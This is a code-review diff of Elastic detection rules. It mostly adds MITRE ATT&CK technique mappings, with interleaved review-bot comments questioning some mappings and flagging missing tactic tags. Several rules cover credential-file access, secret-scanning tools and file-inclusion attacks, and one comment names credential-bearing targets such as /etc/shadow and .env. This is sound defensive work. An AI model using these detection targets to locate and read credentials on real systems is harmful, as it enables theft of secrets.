@@ -95,14 +95,23 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml index 70427bd61ba..ad9183c5d49 100644 --- a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml +++ b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -139,26 +139,54 @@ file where event.action in ("open", "creation", "modification") and event.outcom [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" reference = "https://attack.mitre.org/techniques/T1005/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/credential_access_gitleaks_execution.toml b/rules/cross-platform/credential_access_gitleaks_execution.toml index f4efcf94595..4ae8155c9ca 100644 --- a/rules/cross-platform/credential_access_gitleaks_execution.toml +++ b/rules/cross-platform/credential_access_gitleaks_execution.toml 
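Review bot: T1037.004 (RC Scripts) in the new Persistence block at the end of this hunk looks like a questionable fit for a rule whose query, per the hunk header, watches `file where event.action in ("open", "creation", "modification")` on sensitive files. T1037.004 covers init-style scripts such as `/etc/rc.local`; if the `file.path` list (outside this hunk) is instead shell profile files like `.bashrc`/`.zshrc`, the closer mapping under the same tactic is T1546.004 (Unix Shell Configuration Modification) — confirm against the query before keeping it. Introducing a third tactic also means `tags` needs `"Tactic: Persistence"`, which this hunk does not add.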
@@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,6 +103,16 @@ id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" @@ -112,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1555/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/cross-platform/credential_access_trufflehog_execution.toml b/rules/cross-platform/credential_access_trufflehog_execution.toml index b6faa0d1aee..334251a1f29 100644 --- a/rules/cross-platform/credential_access_trufflehog_execution.toml +++ b/rules/cross-platform/credential_access_trufflehog_execution.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,6 +105,16 @@ id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" @@ -114,3 +124,16 @@ reference = "https://attack.mitre.org/techniques/T1555/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml b/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml index 84468fac2f7..28fd5a021e7 100644 --- a/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml +++ b/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
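Review bot: The new Collection block at the end of this hunk maps TruffleHog execution to T1005 (Data from Local System), while the parallel change to the Gitleaks rule immediately above maps the same tactic to T1213.003 (Code Repositories). Both tools scan repositories for secrets, so the two rules should agree: T1213.003 is the more specific choice, or T1005 if the intent is to also cover plain filesystem scans — pick one for both rules or document why they differ. As with the Gitleaks change, `tags` needs a matching `"Tactic: Collection"` entry that this hunk does not add.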
@@ -73,15 +73,31 @@ In network environments, agents are deployed on hosts to monitor and report acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.002" +name = "Transmitted Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/002/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml index 150a6573e2d..a1863190075 100644 --- a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml +++ b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,14 +86,18 @@ file where event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
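Review bot: The new Impact block in this hunk lacks the blank line before `[rule.threat.tactic]` that the other blocks added in this series carry (compare the Impact block added to the Elastic Agent service rule below), so the spacing is inconsistent within the same commit; running the repository's TOML normaliser over the touched rules would make it uniform. T1565.002 (Transmitted Data Manipulation) under TA0040 is plausible for spoofed agent telemetry, but the rule description is outside this hunk, so confirm the `note` frames the impact as degraded security telemetry rather than business data. `tags` also needs `"Tactic: Impact"` for the newly introduced tactic.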
diff --git a/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml b/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml index 2a258446202..75b91f559df 100644 --- a/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml +++ b/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml index a33eb01577e..2992c160598 100644 --- a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml +++ b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -81,22 +81,41 @@ ROT encoding, a simple letter substitution cipher, is often used to obfuscate Py [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.013" name = "Encrypted/Encoded File" reference = "https://attack.mitre.org/techniques/T1027/013/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml index 812702a98d9..cf95d5c68b5 100644 --- a/rules/cross-platform/defense_evasion_genai_config_modification.toml +++ b/rules/cross-platform/defense_evasion_genai_config_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -104,29 +104,39 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml index 20e0c1c6df0..77ad5e0a025 100644 --- a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml +++ b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "auditd_manager"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -140,19 +140,36 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1587" +name = "Develop Capabilities" +reference = "https://attack.mitre.org/techniques/T1587/" + +[[rule.threat.technique.subtechnique]] +id = "T1587.001" +name = "Malware" +reference = "https://attack.mitre.org/techniques/T1587/001/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml index 1f8053d9767..5a7e264fdc9 100644 --- a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml +++ b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
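Review bot: The Resource Development block (TA0042 / T1587.001 Malware) at the end of this hunk is an unusual mapping for an endpoint `process where event.type == "start"` rule: Resource Development describes adversary preparation that typically happens outside the victim environment and is largely not observable by the defender. On-host compilation is already captured by the existing T1027.004 (Compile After Delivery) mapping, so consider dropping the TA0042 block, or explain in the rule `note` why compilation by a GenAI agent process should be treated as capability development. If it stays, `tags` needs `"Tactic: Resource Development"`, which this hunk does not add.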
@@ -159,14 +159,49 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1030" +name = "Data Transfer Size Limits" +reference = "https://attack.mitre.org/techniques/T1030/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml b/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml index b548ad93348..97c4cbd7997 100644 --- a/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml +++ b/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
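Review bot: T1030 (Data Transfer Size Limits) in the new Exfiltration block at the end of this hunk does not match what the visible part of the query (`sequence by process.entity_id with maxspan=30s`) observes — an encode-then-connect sequence says nothing about chunking or transfer size; T1041 (Exfiltration Over C2 Channel) or T1048 (Exfiltration Over Alternative Protocol) is the closer fit unless the rest of the query measures volume. The Collection block claims both T1560.001 (Archive via Utility) and T1560.002 (Archive via Library) at once; if the query only matches encoding/compression utilities, the library subtechnique is unsupported and should go. Two new tactics also require `"Tactic: Collection"` and `"Tactic: Exfiltration"` in `tags`, which this hunk does not touch.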
@@ -106,3 +106,21 @@ reference = "https://attack.mitre.org/techniques/T1036/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml index 31b65ceebca..136a5eee241 100644 --- a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml +++ b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/30" integration = ["endpoint", "system", "windows", "auditd_manager", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -96,34 +96,40 @@ FROM logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml index c6e250f6b81..e2a495f937b 100644 --- a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml +++ b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -89,14 +89,31 @@ Virtual machine fingerprinting involves identifying virtualized environments by [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml index 2f85b8138b9..af00648718c 100644 --- a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -172,3 +172,47 @@ reference = "https://attack.mitre.org/techniques/T1083/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml index 8ea0b32ead0..ad5487a6d5d 100644 --- a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
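Review bot: `tags` is not updated for the three tactics introduced here (Collection, Credential Access, Initial Access), so unless the array (outside this hunk) already lists `"Tactic: Collection"`, `"Tactic: Credential Access"` and `"Tactic: Initial Access"`, the tactic/tag consistency test will flag this rule three times. T1190 (Exploit Public-Facing Application) is the best-grounded of the new mappings for an LFI rule; T1552.001 (Credentials In Files) is only defensible if the query's path patterns (outside this hunk) include credential-bearing targets such as `/etc/shadow`, `.env` or web-server configuration files, so confirm that before keeping it. The same applies to T1005 — it should be tied to concrete file targets in the query, not asserted generically.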
@@ -133,3 +133,16 @@ framework = "MITRE ATT&CK"
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml
index 8934cb47811..59a2cdf4883 100644
--- a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml
+++ b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/23"
 integration = ["aws", "endpoint"]
 maturity = "production"
-updated_date = "2025/11/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -225,26 +225,36 @@ FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [[rule.threat.technique]]
 id = "T1651"
 name = "Cloud Administration Command"
 reference = "https://attack.mitre.org/techniques/T1651/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
-
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml b/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml
index bc38184ca9b..42fff8466dd 100644
--- a/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml
+++ b/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/09/03"
 integration = ["endpoint", "auditd_manager"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -145,17 +145,31 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [[rule.threat.technique]]
 id = "T1651"
 name = "Cloud Administration Command"
 reference = "https://attack.mitre.org/techniques/T1651/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id"]
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
index 13d278cd24c..807903bc590 100644
--- a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
+++ b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -121,6 +121,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
index 211a1183c0f..25b20279397 100644
--- a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
+++ b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/27"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -125,6 +125,11 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique]]
+id = "T1609"
+name = "Container Administration Command"
+reference = "https://attack.mitre.org/techniques/T1609/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
